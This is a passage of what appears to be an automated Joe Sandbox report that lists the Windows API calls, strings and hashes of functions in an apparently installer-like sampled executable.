                                                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 0045463B
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,004546EB,?,00000000,004547AF), ref: 00454777
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E8D8: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454553
                                                                                                                                                                                                                                                                                                                                                                  • RegCreateKeyEx, xrefs: 004545AF
                                                                                                                                                                                                                                                                                                                                                                  • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00454583
                                                                                                                                                                                                                                                                                                                                                                  • , xrefs: 0045459D
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCreateFormatMessageQueryValue
                                                                                                                                                                                                                                                                                                                                                                  • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2481121983-1280779767
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 519f70821d915b82821537080e3e12c33d17708908ecafe7f5470ba7bd9353bf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a200d9e45076b9aa1c9026ee470310bfc0f5ccdb1a8093a9a555fb12639cba12
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 519f70821d915b82821537080e3e12c33d17708908ecafe7f5470ba7bd9353bf
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C81DE75A00209AFDB00DFD5C941BDFB7F9EB49309F50442AE901FB282D7789A45CB69
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004538A8: CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 00453997
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004538A8: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,004967F1,_iu,?,00000000,004539E2), ref: 004539A7
                                                                                                                                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 0049669D
                                                                                                                                                                                                                                                                                                                                                                  • SetFileAttributesA.KERNEL32(00000000,00000080,00000000,004967F1), ref: 004966BE
                                                                                                                                                                                                                                                                                                                                                                  • CreateWindowExA.USER32(00000000,STATIC,00496800,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 004966E5
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00495E78), ref: 004966F8
                                                                                                                                                                                                                                                                                                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC,00496800), ref: 00496728
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 0049679C
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000), ref: 004967A8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453D1C: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E03
                                                                                                                                                                                                                                                                                                                                                                  • 73EA5CF0.USER32(?,004967CB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,004967C4,?,?,000000FC,00495E78,00000000,STATIC), ref: 004967BE
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: FileWindow$CloseCreateHandle$AttributesCopyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                                                                                                                                                                                                                                                  • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 170458502-2312673372
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 7a5675202604ee279b5d53ebe19463d24adef2e580cd9ada0264daaad7bee20b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 3fac7199250898b77632ea887e905273a0ca2a52c1bf25bf17bddf130f7f486a
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a5675202604ee279b5d53ebe19463d24adef2e580cd9ada0264daaad7bee20b
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE413D70A44208AFDF01EFA5DC42F9E7BB8EB09714F61457AF500F7291D6799E008BA8
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetFolderPathA), ref: 0047CC32
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-1821436788
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: eeaf8f24d3af7a089596ccafad4e97ef4eb9e75c1b126193f65e319f63d4f9f7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeaf8f24d3af7a089596ccafad4e97ef4eb9e75c1b126193f65e319f63d4f9f7
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E451
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E457
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E52D,?,00000000,0047E1E8,00000000), ref: 0042E4A5
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$=aE$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
• API String ID: 4190037839-1003587384
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetActiveWindow.USER32 ref: 00462D68
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462D7C
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462D89
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462D96
• GetWindowRect.USER32(?,00000000), ref: 00462DE2
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462E20
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetActiveWindow.USER32 ref: 0042F1A4
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1B8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1C5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1D2
• GetWindowRect.USER32(?,00000000), ref: 0042F21E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F25C
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,00401B68), ref: 00401ABD
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00684A00,00000000,00401B68), ref: 00401ACF
                                                                                                                                                                                                                                                                                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000,00684A00,00000000,00401B68), ref: 00401AEE
                                                                                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00682C48,?,00000000,00008000,00684A00,00000000,00401B68), ref: 00401B2D
                                                                                                                                                                                                                                                                                                                                                                  • RtlLeaveCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B58
                                                                                                                                                                                                                                                                                                                                                                  • RtlDeleteCriticalSection.KERNEL32(0049B420,00401B6F), ref: 00401B62
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                                                                                                                                                                                                                                                                  • String ID: H,h$L2h$\2h$|2h
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3782394904-2281910222
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 79795942c165c44483fb09e1962e32eaca51f8de38df00e9c029d8aa05623ce8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ef0d8b2142be7cf42810e170793bf0a6b8446fdea194a224c38922696d0a74e0
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B118E30A003405AEB15AB65BE85B263BA5D761B08F44407BF80067BF3D77C5850E7AE
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,0045915F,?,00000000,004591C2,?,?,02123858,00000000), ref: 00458FDD
                                                                                                                                                                                                                                                                                                                                                                  • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 0045903A
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000,00000001,00000000,00000000,00000000,0045915F), ref: 00459047
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00459093
                                                                                                                                                                                                                                                                                                                                                                  • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000), ref: 004590B9
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000001,004590CD,?,-00000020,0000000C,-00004034,00000014,02123858,?,00000000,004590F4,?,00000000), ref: 004590C0
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateEvent$TransactNamedPipe
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2182916169-3012584893
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ab9aaab2ece2f09dc0e54416c5bbf93f57b6f81e0c692a8386f6b93523f7325c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 50fb7c1009465aa7c5405e125e9101384e11cc4d6b330c20a7fc1de2f8ccdd80
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab9aaab2ece2f09dc0e54416c5bbf93f57b6f81e0c692a8386f6b93523f7325c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 68417F71A00608EFDB15DF99C985F9EB7F9EB08714F1044AAF904E72D2C6789E44CB28
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CBD,?,?,00000031,?), ref: 00456B80
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B86
                                                                                                                                                                                                                                                                                                                                                                  • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BD3
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1914119943-2711329623
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RectVisible.GDI32(?,?), ref: 00416E23
                                                                                                                                                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416E37
                                                                                                                                                                                                                                                                                                                                                                  • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E5A
                                                                                                                                                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416E75
                                                                                                                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416EF5
                                                                                                                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F28
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F32
                                                                                                                                                                                                                                                                                                                                                                  • CreateSolidBrush.GDI32(00000000), ref: 00416F42
                                                                                                                                                                                                                                                                                                                                                                  • FrameRect.USER32(?,?,?), ref: 00416F75
                                                                                                                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(?), ref: 00416F7F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 375863564-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                                                                                                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                                                                                                                                                                                                                                                                                                                  • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                                                                                                                                                                                                                                                                                                                  • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                                                                                                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                                                                                                                                                                                                                                                                                                                  • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1694776339-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetSystemMenu.USER32(00000000,00000000), ref: 00422243
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422261
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226E
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042227B
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422288
                                                                                                                                                                                                                                                                                                                                                                  • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422295
